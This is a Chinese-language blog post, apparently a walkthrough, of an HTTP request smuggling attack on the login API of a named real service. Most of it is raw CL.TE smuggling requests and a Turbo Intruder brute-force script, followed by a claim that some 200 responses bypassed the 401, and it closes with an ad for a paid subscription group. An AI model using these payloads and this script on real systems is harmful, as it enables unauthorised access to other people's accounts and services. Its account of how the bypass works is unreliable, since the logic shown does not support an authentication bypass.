登陆功能中存在的请求走私问题
原请求:
POST /api/sessions HTTP/1.1
Host:console.helium.com
User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:68.0)Gecko/20100101Firefox/68.0
Accept:application/json,text/plain,*/*
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Referer:https://console.helium.com/login
Content-Type:application/json
Content-Length:109
DNT:1
Connection:close
Cookie:key=value{"session":{"email":"[email protected]","password":"sdfsdf"}}
响应为401
第二步:
POST /api/sessions HTTP/1.1
Host:console.helium.com
User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:68.0)Gecko/20100101Firefox/68.0
Accept:application/json,text/plain,*/*
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Referer:https://console.helium.com/login
Content-Type:application/json
Content-Length:109
DNT:1
Connection:close
Cookie:key=value
Transfer-Encoding:chunked39
{"session":{"email":"[email protected]","password":"sdfsdf"}}
00
响应仍然为401
第三步:
POST /api/sessions HTTP/1.1
Host:console.helium.com
User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:68.0)Gecko/20100101Firefox/68.0
Accept:application/json,text/plain,*/*
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Referer:https://console.helium.com/login
Content-Type:application/json
Content-Length:109
DNT:1
Connection:close
Cookie:key=value
Transfer-Encoding:chunked39
{"session":{"email":"[email protected]","password":"sdfsdf"}}
00
GET /HTTP/1.1
Host:www.helium.com
foo:x
注意:上面的39是16进制的
这里需要使用到一个插件:turbo intruder(一般并发的时候也是使用的这个插件)
这里选中x,然后右击发送至turbo intruder
可以利用下面这个脚本:
def queueRequests(target,wordlists):
engine=RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=50,
pipeline=False
)for i in range(3,8):
engine.queue(target.req,randstr(i),learn=1)
engine.queue(target.req,target.baseInput,learn=2)
for word in open('/yourpath/to/dict/alphabet.txt'):
engine.queue(target.req,word.rstrip())
def handleResponse(req,interesting):
table.add(req)
上面的字典可以自己写个脚本设置一下,里面主要包含字母和数字,不是很复杂
然后点击attack,即可开始发起攻击,最后如下所示:
最后发现有几个的响应是200,说明是绕过401的
如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放